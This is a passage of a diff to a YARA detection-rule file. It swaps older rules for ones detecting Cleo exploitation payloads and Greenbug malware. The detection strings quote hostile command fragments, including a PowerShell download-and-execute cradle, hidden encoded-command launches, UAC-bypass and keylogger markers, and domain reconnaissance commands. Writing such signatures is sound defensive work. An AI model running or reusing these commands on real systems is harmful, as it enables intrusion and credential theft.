-		$s7 = "GetNativeSystemInfo" wide ascii
-		$s8 = "%08x%08x%08x%08x" wide ascii
+		$xe1 = "Start-Process -WindowStyle Hidden -FilePath jre\\bin\\java.exe" base64 ascii wide
+		$xe2 = "$f=\"cleo." base64 ascii wide
+		$xe3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " base64 ascii wide
+		$x1 = "$f=\"cleo." ascii wide
+		$x2 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_1 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_JAR_Indicators_Dec24 : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5277255-3ced-5dc5-9490-c5829a0c248b"
-		date = "2017-07-07"
-		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L11-L25"
+		description = "Detects characteristics of JAR files used during Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "4e8f6aa8-9efd-5fcf-b795-5042d4ba1708"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L204-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b7f00dfb83f5da46663d94f238b55e375743edbdb01701a78922b87c72c518a"
-		score = 75
+		logic_hash = "8b87e7000ab5d9759f55660a085bf0f3dddb46ad1ea411cbbabce1000105ee9e"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$s1 = "ezExODA0Y2U0LTkzMGEtNGIwOS1iZjcwLTlmMWE5NWQwZDcwZH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{c00" wide
+		$s1 = "TLS v3 " ascii
+		$s2 = "java/util/Base64$Decoder" ascii
+		$s3 = "AES/CBC/NoPadding" ascii
+		$s4 = "getenv" ascii
+		$s5 = "ava/util/zip/ZipInputStream" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0xfeca and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_2 : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_1_1 : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ef02003-83d1-5ec7-952d-1e693375dd4b"
-		date = "2017-07-07"
-		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L27-L42"
+		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - files Cli, ScSlot, Slot, SrvSlot"
+		author = "Florian Roth"
+		id = "2940ddad-3dba-594a-9111-e4741d6ff39b"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L224-L245"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "35a517039474dcc5d503a48ca17e544166ee2ed44417ea5e7711093d3956f80c"
+		logic_hash = "85600e9310e502b3b2135f2f3cf698ae54fe362047cdf9d378dcc107e0c2fa18"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7e122a882d625f4ccac019efb7bf1b1024b9e0919d205105e7e299fb1a20a326"
+		hash1 = "0c57b317b572d071afd8ccdb844dd6f117e20f818c6031d7ba8adcbd32be0617"
 
 	strings:
-		$s1 = "Folder.exe" fullword ascii
-		$s2 = "Notepad++.exe" fullword wide
-		$s3 = "RSJLRSJOMSJ" fullword ascii
+		$a1 = "java/lang/StringBuffer"
+		$x1 = "Start-Sleep 3;del " ascii
+		$x2 = "sleep 3;rm -f '" ascii
+		$x3 = "powershell -Noninteractive -EncodedCommand " ascii
+		$x4 = "runDelFileCmd" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		uint16( 0 ) == 0xfeca and filesize < 50KB and $a1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_3 : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_2 : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e1a3323e-fe84-59e5-86d9-dca0c261e3c3"
-		date = "2017-07-07"
-		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L44-L59"
+		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - file Proc"
+		author = "Florian Roth"
+		id = "bd575454-7fd0-566d-94e5-ec1368675108"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L247-L265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4829905ede523fd9ed2cdf610f8fce4c0a5d993885e1897d1782ca70e96fa9a2"
+		logic_hash = "2bb5eace09b832bf3ce296484f473c9c56f97b881ea17838408be6000cc6fcb1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "995eee4122802c2dc83bb619f8c53173a5a9c656ad8f43178223d78802445131"
-		hash2 = "fec657a19356753008b0f477083993aa5c36ebaf7276742cf84bfe614678746b"
+		hash1 = "1ba95af21bac45db43ebf02f87ecedde802c7de4d472f33e74ee0a5b5015a726"
 
 	strings:
-		$s1 = "ccleaner.exe" fullword wide
-		$s2 = "Folder.exe" fullword ascii
+		$s1 = "Timeout getting pipe-data" ascii fullword
+		$s2 = "Ftprootpath" ascii fullword
+		$s3 = "Rest cmd=" ascii fullword
+		$s4 = "writeToProc" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+		uint16( 0 ) == 0xfeca and filesize < 30KB and 3 of them
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_4 : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_3 : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cad0c6a2-d286-52fa-b9b8-793ab9ae048f"
-		date = "2017-07-07"
-		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L61-L76"
+		description = "Detects characteristics of JAR files used during Cleo software exploitation"
+		author = "X__Junior"
+		id = "5c227bb9-0731-5955-a758-6fe86ecc2d86"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L267-L286"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dec058ae52a860f4850d7b8024b96c5a9044fdcebadbc12b384f5a6dfae91634"
+		logic_hash = "64a6194110d4eb359cc3f15137cf752d598f2f0a52ac181fcaa358bf40072f54"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c"
 
 	strings:
-		$x1 = "get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName')" wide
-		$x2 = "O.Run C & chrw(34) & \"[System.IO.File]::" wide
-		$x3 = "HKCU\\SOFTWARE\\Microsoft\\\\KeyName\"" fullword wide
+		$a1 = "java/lang/String" ascii
+		$s1 = "#lsz#" ascii
+		$s2 = "#dbg#" ascii
+		$s3 = "#ll#" ascii
+		$s4 = "SvZipDataOverflow=%d OpNotConf=" ascii
 
 	condition:
-		( filesize < 700KB and 1 of them )
+		uint16( 0 ) == 0xfeca and filesize < 20KB and 3 of ( $s* ) and $a1
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_5 : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_1 : FILE
 {
 	meta:
-		description = "Detects Molerats sample - July 2017"
+		description = "Detects Malware from Greenbug Incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c9dd4f4a-a980-5339-b238-9f53360b89ae"
-		date = "2017-07-07"
+		id = "3375a392-4896-572c-9688-00f01ea86ca7"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L78-L95"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L12-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb2bb54fc1749d8422cdc8e084e1fa66981611128f56e7d7d678f177d37b7cdd"
+		logic_hash = "e060a197dec0ce5da385abd282f0c4397bace8945b36198955925d02444b37a3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
+		hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
 
 	strings:
-		$x1 = "powershell.exe -nop -c \"iex" nocase ascii
-		$x2 = ".run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\" ascii
-		$a1 = "Net.WebClient).DownloadString" nocase ascii
-		$a2 = "gist.githubusercontent.com" nocase ascii
+		$s1 = "vailablez" fullword ascii
+		$s2 = "Sfouglr" fullword ascii
 
 	condition:
-		filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Molerats_Jul17_Sample_Dropper : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_2 : FILE
 {
 	meta:
-		description = "Detects Molerats sample dropper SFX - July 2017"
+		description = "Detects Backdoor from Greenbug Incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4622373-b496-51de-abaa-caa665b558b3"
-		date = "2017-07-07"
+		id = "e5d5ddae-cf6d-579f-9a67-9406838b5e0b"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L97-L112"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L28-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b356d8dbca8f4d11dda976e7eb03c993d05af35d13113b8c85fb07531a0203dc"
+		logic_hash = "25a9e1f08187f3d3cd0ec1384a5f4647c3368b99062f2e0d7d45c6c2ffeb66e0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad0b3ac8c573d84c0862bf1c912dba951ec280d31fe5b84745ccd12164b0bcdb"
+		hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
+		hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
+		hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
 
 	strings:
-		$s1 = "Please remove %s from %s folder. It is unsecure to run %s until it is done." fullword wide
-		$s2 = "sfxrar.exe" fullword ascii
-		$s3 = "attachment.hta" fullword ascii
+		$x1 = "|||Command executed successfully" fullword ascii
+		$x2 = "\\Release\\Bot Fresh.pdb" ascii
+		$x3 = "C:\\ddd\\a1.txt" fullword wide
+		$x4 = "Bots\\Bot5\\x64\\Release" ascii
+		$x5 = "Bot5\\Release\\Ism.pdb" ascii
+		$x6 = "Bot\\Release\\Ism.pdb" ascii
+		$x7 = "\\Bot Fresh\\Release\\Bot" ascii
+		$s1 = "/Home/SaveFile?commandId=CmdResult=" fullword wide
+		$s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii
+		$s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$s4 = "SELECT * FROM AntiVirusProduct" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Hiddencobra_BANKSHOT_Gen : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_3
 {
 	meta:
-		description = "Detects Hidden Cobra BANKSHOT trojan"
+		description = "Detects Backdoor from Greenbug Incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fbf9dd32-cb9a-51f2-bd03-0387fbf44baa"
-		date = "2017-12-26"
-		modified = "2022-06-10"
-		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_bankshot.yar#L11-L63"
+		id = "68142bcd-4bd0-5c80-97fc-38811565e21c"
+		date = "2017-01-25"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L56-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db4d396736ab42942f1a11a819419410e388b011e8992ad187c2f484d637c99c"
+		logic_hash = "f4e8672da2ed9d90d4ebfccca977c4aeb93656d9e467cf479699cefd03611f32"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		hash1 = "89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486"
-		hash2 = "8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247"
-		hash3 = "b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24"
-		hash4 = "daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75"
-		hash5 = "ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699"
-		hash6 = "d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff"
-		hash7 = "ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9"
-		hash8 = "3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6"
-		hash9 = "6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca"
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
+		hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
 
 	strings:
-		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword wide
-		$s2 = "rHTTP/1.1 200 Connection established" fullword wide
-		$s3 = "Proxy-Connection: keep-alive" fullword wide
-		$s4 = "\\msncf.dat" wide
-		$s5 = "msvcru32.bat" fullword ascii
-		$s6 = "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"%s\" /f" fullword ascii
-		$s7 = "MXINFO.DLL" fullword ascii
-		$s8 = "usrvc32.bat" fullword ascii
-		$s9 = "ping -n 1 127.0.0.1" fullword ascii
-		$s10 = "%sd.e%sc \"%s > %s 2>&1\"" ascii fullword
-		$s11 = "DWS*.tmp" ascii fullword
-		$s12 = "CS*.tmp" fullword wide
-		$s13 = "WM*.tmp" fullword wide
-		$x1 = "CgpaipIddwspwe32Hnaehsdi" fullword ascii
-		$x2 = "RpiPmtiCdopIsgpao" fullword ascii
-		$x3 = "RpiLtnodlhOtgpcidgyA" fullword ascii
-		$x4 = "LatiQdgHtnrwpDbupci" fullword ascii
-		$x6 = "\\system32\\msncf.dat" ascii
-		$x7 = "GprthipgHpgktcpCigwSanowpgA" fullword ascii
-		$a1 = "live.dropbox.com" fullword ascii
-		$a2 = "tatadocomo.yahoo.com" fullword ascii
-		$a3 = "widgets.twimg.com" fullword ascii
-		$a4 = "history.paypal.com" fullword ascii
-		$a5 = "www.bitcoin.org" fullword ascii
-		$a6 = "web.whatsapp.com" fullword ascii
+		$x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii
+		$x2 = "C:\\ddd\\wer2.txt" fullword wide
+		$x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of ( $s* ) or 4 of ( $a* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Unauthorized_Proxy_Server_RAT
+rule SIGNATURE_BASE_Greenbug_Malware_4 : FILE
 {
 	meta:
-		description = "Detects Proxy Server RAT"
-		author = "US-CERT Code Analysis Team"
-		id = "378573e3-17a7-5862-aae5-a8e84102e237"
-		date = "2017-12-26"
+		description = "Detects ISMDoor Backdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d45dea36-6051-5531-afd2-abf27cd06a12"
+		date = "2017-01-25"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_bankshot.yar#L67-L92"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L75-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ede26272ddcb25dca2b44ff08b232f358078872f6cf76491b0fd8d65772c60d"
+		logic_hash = "869832536d838e062227ccd3b84f8559d2215360c0e09ec791db623d7d3d7a3b"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "C74E289AD927E81D2A1A56BC73E394AB"
-		hash2 = "2950E3741D7AF69E0CA0C5013ABC4209"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
+		hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3}
-		$s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3}
-		$s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3}
-		$s3 = {8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3}
-		$s4 = {B91A7900008A140780F29A8810404975F4}
-		$s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9FD19CA59F7E9F539CEF9F029F969C6C9E5C9D949FC99F}
-		$s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3}
-		$s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC}
-		$s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24}
-		$s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523}
-		$s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0}
-		$s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7}
-		$s12 = {448BE8B84FECC44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541}
-		$s13 = {8A0A80F9627C2380F9797F1E80F9647C0A80F96D7F0580C10BEB0D80F96F7C0A80F9787F05}
+		$s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii
+		$s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" fullword ascii
+		$s3 = "c:\\windows\\temp\\tmp8873" fullword ascii
+		$s4 = "taskkill /im winit.exe /f" fullword ascii
+		$s5 = "invoke-psuacme"
+		$s6 = "-method oobe -payload \"\"" fullword ascii
+		$s7 = "C:\\ProgramData\\stat2.dat" fullword wide
+		$s8 = "Invoke-bypassuac" fullword ascii
+		$s9 = "Start Keylog Done" fullword wide
+		$s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii
+		$s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii
+		$s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_URL_File_Local_EXE : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_5 : FILE
 {
 	meta:
-		description = "Detects an .url file that points to a local executable"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b157e98-7b69-5649-b1d8-40bd6b685bf6"
-		date = "2017-10-04"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malwareforme/status/915300883012870144"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_to_local_exe.yar#L1-L15"
+		id = "12362711-f466-5f9e-9227-1cf84aec93e5"
+		date = "2017-01-25"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L103-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b85b723142f52ade68f6eb8ba54bb7dffafce0df6d1ae8a7c08b3ce621ccadd4"
-		score = 60
-		quality = 60
+		logic_hash = "cdb4b2447e7eb3546b33a804abf5fbc20817823e5c9440109db7b44adf90899d"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
+		hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
+		hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
+		hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$s1 = "[InternetShortcut]" ascii wide fullword
-		$s2 = /URL=file:\/\/\/C:\\[^\n]{1,50}\.exe/
+		$x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii
+		$x2 = "cmd /a /c net user administrator /domain >>" fullword ascii
+		$x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" ascii
+		$o1 = "========================== (Net User) ==========================" ascii fullword
 
 	condition:
-		filesize < 400 and all of them
+		filesize < 2000KB and ( ( uint16( 0 ) == 0x5a4d and 1 of them ) or $o1 )
 }
 
-rule SIGNATURE_BASE_Tophat_Malware_Jan18_1 : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects malware from TopHat campaign"
+		description = "Detects Greenbug Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec290eee-a21e-548d-b7cc-3e25e7c39d22"
-		date = "2018-01-29"
+		id = "50816c09-5f38-5e05-9915-b96f00ee4b88"
+		date = "2017-11-26"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tophat.yar#L13-L36"
+		reference = "http://www.clearskysec.com/greenbug/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L141-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69a1e1105b28d66203f74e68038efacc926e501e28a73865485adf2fd7fc0ac0"
+		logic_hash = "afd006d7e53cdedbed5938e5dea71273dd21a1382239bac03194662e95d053c8"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c0b253966befd57f4d22548f01116ffa367d027f162514c1b043a747bead596"
-		hash2 = "1f9bca1d5ce5d14d478d32f105b3ab5d15e1c520bde5dfca22324262e84d4eaf"
+		hash1 = "6e55e161dc9ace3076640a36ef4a8819bb85c6d5e88d8e852088478f79cf3b7c"
+		hash2 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$s1 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
-		$s2 = "UENCRYPTION" fullword ascii
-		$s3 = "TEXPORTAPIS" fullword ascii
-		$s4 = "tcustommemorystream" fullword ascii
-		$s5 = "tmemorystream" fullword ascii
-		$s6 = "ExtrasNoteCONSOLEemb" fullword ascii
-		$s7 = "DIALOG INCLUDE" fullword ascii
+		$x1 = "AgentV2.exe  -c  SampleDomain.com" fullword ascii
+		$x2 = ".ntpupdateserver.com" fullword ascii
+		$x3 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
+		$x4 = "a67d0db885a3432576548a2a03707334" fullword ascii
+		$x5 = "a67d0db8a2a173347654432503702aa3" fullword ascii
+		$x6 = "!!! can not create output file !!!" fullword ascii
+		$s1 = "\\runlog*" ascii
+		$s2 = "can not specify username!!" fullword ascii
+		$s3 = "Agent can not be configured" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "c221006b240b1c993217bd61e5ee31b6" or 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "58ba44f7ff5436a603fec3df97d815ea" or pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or 1 of ( $x* ) or 3 of them )
 }
-
-rule SIGNATURE_BASE_Tophat_Malware_Jan18_2 : FILE
+rule SIGNATURE_BASE_MAL_Webmonitor_RAT : FILE
 {
 	meta:
